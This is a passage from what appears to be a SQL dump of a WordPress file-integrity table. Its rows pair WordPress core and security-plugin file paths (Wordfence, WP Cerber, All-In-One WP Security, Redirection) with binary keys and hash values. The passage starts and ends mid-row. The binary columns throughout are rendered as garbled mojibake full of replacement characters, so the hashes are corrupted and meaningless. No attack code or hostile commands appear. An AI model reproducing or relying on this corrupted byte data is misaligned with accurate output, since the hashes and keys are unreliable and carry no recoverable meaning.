�ܹ\Z�#�9��D!��N�*!uo�t','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�gv�\r]�G�ط�','l�`A��׫mS��<0p8Zs�~�x@��S[�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ‘�P�G�B���$���	�JE3�n^�','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(�†�','',0,'?'),('�$����R\\�r-�y','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�\'s��J����x','+{��h���/&�Z|��>	��s:!���鸮-�','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.4��%h���|�*�n','&<�+���;�Wƻ���t�jmx��0:Is��','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�W#:��V��^H3X','wp-includes/blocks/nextpage/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�`�\ZJ������$�','O��1NJ8���#���C�\\({xSzW\'L�','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�8�l,��+Tǎ','4C]�(����ߴ��f�ʙ)Ycy��$�','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"m<��i��>��kMR','r�ۄ��(�ƅ�]�H�ָ�U.�\0�KR�FZΆ�','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3�	{��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('��yY)h��N��Á�','wp-includes/js/dist/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǿD۔5��P��?S','l��Y9b<E6{��ùv2���@۾�[','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o	&�\'����&�Q�R���~E�1�d','',0,'?'),('�BGA1�O��<v*��N','wp-content/plugins/wordfence/modules/login-security/css/admin.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�:��W�ݱb','�`��ʂw��\'��J^�8V�h�o7�c�0','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�$B`w�ƕ���','�a����6���Ο���v]z5�����\r�p�c�','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�?a��۩~S�4�\0L','JAտ�\"�S֕J��]����ŋ������','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ᴐ�7�Am�]���','#b^�=��^Nل�6t�7F�[C1dV��','',0,'?'),('�>��I7m���>�꣍','wp-includes/blocks/embed/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m,��-u�m���Ԫ','H��fUgqP���� ar2�䥬{~���?�','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�u�\\����)��S�_','wp-content/plugins/redirection/actions/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�_��i����_�','��d\0A޲�3���F�~i���JWJuk��lI','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۲�A�Q��[��dK�','�&��-꽪k�@���*�:��m���M\n��','',0,'?'),('��3����R�C���V','wp-includes/blocks/calendar/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�m�zVp��a','�c���عko2Ȑb9�F�Xԩ)ji-��;�','',0,'?'),('�V��\nT>Z���-2L','wp-content/plugins/redirection/locale/redirection-en_AU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���l��\0]�O�!�}}','����J��y�4��s&��\ne���1��eB|Y','',0,'?'),('�^Q6l��J!�	�ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('��ɱ%��a{Z�j	%�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	e3pN_on0��}�','���\Z���x�P�����������x�','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('���D���\"[v���i�','wp-includes/blocks/query-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DX�p��\Z��y?w����','n灴U����¢�H������ZO���h�?\r','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1V����tL,���k_�,','�\n��z#�C�Uh��4�7��)S��Xյ�e� ','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��,2�/b3S��','�F�c{�+�o�>\n��4���P���T,���S�','',0,'?'),('��l]���g	S�D�n','wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���mda�ׇ���','š�\'ۈ%�]����k8��3���{f�xǪT','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z6�ܩ��%I���-','@�ܦ\'�sj\n�̓\rפ��綻�|՜�R��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c��\r��u��','��t�֞���9���ID܄z�xw·�<�m�','',0,'?'),('�	e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�����iYn$�q��G�','v_��eI�ܑ������z\"��[�1\no���F','',0,'?'),('��A����)͹D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;�	]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�\"(���b?\Zg�s�q�','wp-includes/css/dist/reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JRK�N�` �1U%�','�+��,q�K�*��~��B��2���\n�ū�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^p�Y�q_��]�к','=|�+bM+��AWH��P�P-��~��L�','',0,'?'),('�4/��ف�~��<+�','wp-includes/blocks/post-excerpt/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,G4<{��l+�]�\'u','�/xH�� �+���{$�Ua�\0��ۤ�Nz#�','',0,'?'),('�:Y����>���=','wp-includes/blocks/media-text/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nc�J�F�>&$�@\\','�J�� `��dc٪�\']�egx�h_�>�A�;��','',0,'?'),('�E,莱�;�QS>E�','wp-content/themes/newsmagbd/inc/tgm/loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[>�))�li�h翳�~','�b�b�A�ځ\\�ِ(_[*�����$����\0�','',0,'?'),('�k0�k⟆��V�X��','wp-includes/blocks/file/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���q�*� �j��','�?�0\nkR��dfl�ꇾ�ܫ��O���{f','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϼ~c��祐i�','��L�3�gQ����������l\"�K�E�3_','',0,'?'),('�w	���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�EJR�`��5\Z�C\n','�_���N�R�Ϧg�N�r��{���oXӮ�','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�Ni;�Pl�vk�','���ʱ��)6{�+��[jt����F�Al�HR','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӷ^�f&�լ�)�','�J��Q�����	�\Z$�v���\Z1\\','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n\0��>��>|','_�L�q���Y�\0�lh�s2?�D��\r','',0,'?'),('��GtYL�^O�@���{�','wp-content/plugins/redirection/modules/wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c 	����\'���U�y�','��~k����vD6�<�q�RԾ���O5�G�$','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��Y�W�G(U��','iM�\'���s��B�0\r+!��f�2�%Y��\r�','',0,'?'),('��g�(�35��5�k�(','wp-includes/blocks/heading/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+)�/��\n�_,,п','~��.�bֹ��Nk��D�ډ%3�ޠ�g���','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K��y�\"��J���','~T��)_����ԇ���YH+���ɏ\'�	;','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4N�J��p)!�fξ','���X�U@�l���a��_m��b �e���s','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�zt�[���������','wp-includes/blocks/heading/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� 	','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('���\'��VB�~�w','wp-includes/blocks/query-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#Z�!��	,�l�z�','���{q�\0�x��_3����A�y��k�$�','',0,'?'),('���э�%w��~���~','wp-content/plugins/redirection/matches/referrer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��a��l���H�3','����\r�.��_�I4�ZDf�5�A�ڝ�/(','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��Z0��R��#\ZY�Z','ȭT��N%!� =v����8�๬��s�ݸ׋','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('�����ʵ#&����J','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n1��ڋ�\"-�Y�','l��\\$���x9\'�[�>M��\0�;y>N�2�`�','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�2�nX���~Y7��','\n�m�DK��v��\'K��Kl�;�6D��\rs�Gc�','',0,'?'),('�^��N4ӝ,ba��D','wp-includes/css/dist/widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�&d5\\��g�A��','T�S�T�߸�M](v\\}��p�H|����`��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�/C[���]�u%�','�W���B&6�9�g�k_����EF�6�I','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l,va��Ou�\\|�/�;','\'�+��DsgW�\'ԟ�~^�0EV�n_,2u\n��','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0C�W�:N��h','������|��A\'�g����#-��FZ���','',0,'?'),('����i�O�%1-��','wp-content/plugins/redirection/database/schema/420.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�ϙ�����[�qs�','D;$�En�H(o�2,�\0F@`RgC�lԓ�ȕ�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('����u��qm�Ƈ','wp-content/plugins/wp-cerber/assets/fonts/cerber.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���.XG�����','�V�n;����D�vFz,�Tk�U�.�,ub\Z�','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�n���n;����8^Q','D��	�,�?���g�߷Ѿ������3�ȭ','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mFw-,��J:T��ؗ','oG�a�(�		���\0���d�ǒ�A�b0','',0,'?'),('�la\'�P_b�m	!���p','wp-includes/blocks/audio/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gب���_0�u\\','���q���fY)�J�_K�g�YUr�\'�%e\"�','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$	����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('���!|MWk��pr�','wp-includes/blocks/query/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PSNJ	